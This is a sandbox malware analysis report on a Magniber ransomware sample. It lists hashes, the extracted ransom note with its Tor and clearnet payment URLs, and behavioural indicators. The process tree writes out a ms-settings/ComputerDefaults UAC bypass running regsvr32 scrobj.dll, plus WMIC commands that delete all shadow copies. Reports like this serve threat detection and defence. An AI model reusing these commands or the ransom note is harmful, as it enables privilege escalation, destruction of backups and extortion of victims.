magniber | 4dc683cb3f26f60ed125f730024b3f2d8620d58896016a0fca416fb27d809a06

Analysis

max time kernel
148s
max time network
122s
platform
windows10_x64
resource
win10-en-20211104
submitted
23-11-2021 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://b864ea5816f46e1066eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://b864ea5816f46e1066eltalkfzj.jobsbig.cam/eltalkfzj http://b864ea5816f46e1066eltalkfzj.boxgas.icu/eltalkfzj http://b864ea5816f46e1066eltalkfzj.sixsees.club/eltalkfzj http://b864ea5816f46e1066eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://b864ea5816f46e1066eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://b864ea5816f46e1066eltalkfzj.jobsbig.cam/eltalkfzj

http://b864ea5816f46e1066eltalkfzj.boxgas.icu/eltalkfzj

http://b864ea5816f46e1066eltalkfzj.sixsees.club/eltalkfzj

http://b864ea5816f46e1066eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 14 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2444	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4708	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1344	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1616	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4620	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3236	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	692	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1224	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3488	4720	cmd.exe	104
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3876	4720	cmd.exe	104

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\AssertSwitch.tiff => C:\Users\Admin\Pictures\AssertSwitch.tiff.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\JoinDeny.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\JoinDeny.tiff => C:\Users\Admin\Pictures\JoinDeny.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UninstallStop.png => C:\Users\Admin\Pictures\UninstallStop.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\StopFind.crw => C:\Users\Admin\Pictures\StopFind.crw.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\AssertSwitch.tiff	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	Process	procid_target
PID 3472 set thread context of 2476	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	35
PID 3472 set thread context of 2508	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	56
PID 3472 set thread context of 2732	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	49
PID 3472 set thread context of 2036	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	37
PID 3472 set thread context of 3596	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	48
PID 3472 set thread context of 3736	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	40

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
1976	3736	WerFault.exe	40

Modifies registry class 29 IoCs

Processes:

taskhostw.exeRuntimeBroker.exeExplorer.EXEsihost.exesvchost.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
4512	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	Process
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe
1976	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
2036	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	Process
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exeExplorer.EXEWMIC.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	1976	WerFault.exe
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeShutdownPrivilege	2036	Explorer.EXE
Token: SeCreatePagefilePrivilege	2036	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	368	WMIC.exe
Token: SeSecurityPrivilege	368	WMIC.exe
Token: SeTakeOwnershipPrivilege	368	WMIC.exe
Token: SeLoadDriverPrivilege	368	WMIC.exe
Token: SeSystemProfilePrivilege	368	WMIC.exe
Token: SeSystemtimePrivilege	368	WMIC.exe
Token: SeProfSingleProcessPrivilege	368	WMIC.exe
Token: SeIncBasePriorityPrivilege	368	WMIC.exe
Token: SeCreatePagefilePrivilege	368	WMIC.exe
Token: SeBackupPrivilege	368	WMIC.exe
Token: SeRestorePrivilege	368	WMIC.exe
Token: SeShutdownPrivilege	368	WMIC.exe
Token: SeDebugPrivilege	368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	368	WMIC.exe
Token: SeRemoteShutdownPrivilege	368	WMIC.exe
Token: SeUndockPrivilege	368	WMIC.exe
Token: SeManageVolumePrivilege	368	WMIC.exe
Token: 33	368	WMIC.exe
Token: 34	368	WMIC.exe
Token: 35	368	WMIC.exe
Token: 36	368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1236	WMIC.exe
Token: SeSecurityPrivilege	1236	WMIC.exe
Token: SeTakeOwnershipPrivilege	1236	WMIC.exe
Token: SeLoadDriverPrivilege	1236	WMIC.exe
Token: SeSystemProfilePrivilege	1236	WMIC.exe
Token: SeSystemtimePrivilege	1236	WMIC.exe
Token: SeProfSingleProcessPrivilege	1236	WMIC.exe
Token: SeIncBasePriorityPrivilege	1236	WMIC.exe
Token: SeCreatePagefilePrivilege	1236	WMIC.exe
Token: SeBackupPrivilege	1236	WMIC.exe
Token: SeRestorePrivilege	1236	WMIC.exe
Token: SeShutdownPrivilege	1236	WMIC.exe
Token: SeDebugPrivilege	1236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1236	WMIC.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
2036	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.exesvchost.execmd.execmd.execmd.execmd.exetaskhostw.exeRuntimeBroker.exeExplorer.EXE1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2476 wrote to memory of 4512	2476	sihost.exe	70
PID 2476 wrote to memory of 4512	2476	sihost.exe	70
PID 2476 wrote to memory of 4444	2476	sihost.exe	71
PID 2476 wrote to memory of 4444	2476	sihost.exe	71
PID 2476 wrote to memory of 432	2476	sihost.exe	72
PID 2476 wrote to memory of 432	2476	sihost.exe	72
PID 2476 wrote to memory of 3220	2476	sihost.exe	77
PID 2476 wrote to memory of 3220	2476	sihost.exe	77
PID 2508 wrote to memory of 3200	2508	svchost.exe	78
PID 2508 wrote to memory of 3200	2508	svchost.exe	78
PID 2508 wrote to memory of 528	2508	svchost.exe	79
PID 2508 wrote to memory of 528	2508	svchost.exe	79
PID 3220 wrote to memory of 368	3220	cmd.exe	82
PID 3220 wrote to memory of 368	3220	cmd.exe	82
PID 432 wrote to memory of 1228	432	cmd.exe	83
PID 432 wrote to memory of 1228	432	cmd.exe	83
PID 528 wrote to memory of 1236	528	cmd.exe	84
PID 528 wrote to memory of 1236	528	cmd.exe	84
PID 3200 wrote to memory of 1436	3200	cmd.exe	85
PID 3200 wrote to memory of 1436	3200	cmd.exe	85
PID 2732 wrote to memory of 4672	2732	taskhostw.exe	88
PID 2732 wrote to memory of 4672	2732	taskhostw.exe	88
PID 3596 wrote to memory of 3008	3596	RuntimeBroker.exe	87
PID 3596 wrote to memory of 3008	3596	RuntimeBroker.exe	87
PID 2036 wrote to memory of 2628	2036	Explorer.EXE	86
PID 2036 wrote to memory of 2628	2036	Explorer.EXE	86
PID 2732 wrote to memory of 2640	2732	taskhostw.exe	101
PID 2732 wrote to memory of 2640	2732	taskhostw.exe	101
PID 2036 wrote to memory of 2268	2036	Explorer.EXE	90
PID 2036 wrote to memory of 2268	2036	Explorer.EXE	90
PID 3596 wrote to memory of 2656	3596	RuntimeBroker.exe	89
PID 3596 wrote to memory of 2656	3596	RuntimeBroker.exe	89
PID 3472 wrote to memory of 648	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	97
PID 3472 wrote to memory of 648	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	97
PID 3472 wrote to memory of 4988	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	93
PID 3472 wrote to memory of 4988	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	93
PID 3472 wrote to memory of 3640	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 3472 wrote to memory of 3640	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	102
PID 3472 wrote to memory of 5036	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 3472 wrote to memory of 5036	3472	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	103
PID 2628 wrote to memory of 5088	2628	cmd.exe	107
PID 2628 wrote to memory of 5088	2628	cmd.exe	107
PID 4672 wrote to memory of 1860	4672	cmd.exe	108
PID 4672 wrote to memory of 1860	4672	cmd.exe	108
PID 2268 wrote to memory of 2840	2268	cmd.exe	110
PID 2268 wrote to memory of 2840	2268	cmd.exe	110
PID 2640 wrote to memory of 3988	2640	cmd.exe	109
PID 2640 wrote to memory of 3988	2640	cmd.exe	109
PID 648 wrote to memory of 1888	648	cmd.exe	111
PID 648 wrote to memory of 1888	648	cmd.exe	111
PID 4988 wrote to memory of 604	4988	cmd.exe	112
PID 4988 wrote to memory of 604	4988	cmd.exe	112
PID 3008 wrote to memory of 3868	3008	cmd.exe	114
PID 3008 wrote to memory of 3868	3008	cmd.exe	114
PID 2656 wrote to memory of 3256	2656	cmd.exe	113
PID 2656 wrote to memory of 3256	2656	cmd.exe	113
PID 5036 wrote to memory of 2284	5036	cmd.exe	115
PID 5036 wrote to memory of 2284	5036	cmd.exe	115
PID 3640 wrote to memory of 4272	3640	cmd.exe	116
PID 3640 wrote to memory of 4272	3640	cmd.exe	116
PID 2444 wrote to memory of 4572	2444	cmd.exe	125
PID 2444 wrote to memory of 4572	2444	cmd.exe	125
PID 1300 wrote to memory of 2880	1300	cmd.exe	126
PID 1300 wrote to memory of 2880	1300	cmd.exe	126

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2476
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4512
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://b864ea5816f46e1066eltalkfzj.jobsbig.cam/eltalkfzj^&1^&35536225^&68^&303^&2215063"
  2⤵
  PID:4444
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:432
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1228
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3220
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:368

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4988
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:604
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:648
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1888
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4272
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2284
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2840

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3736
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3736 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3868
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2656
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3256

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2732
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1860
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3988

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2508
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1436
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:528
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1236

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2880

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4572

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4708
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3780

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1344
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3284

C:\Windows\system32\cmd.exe
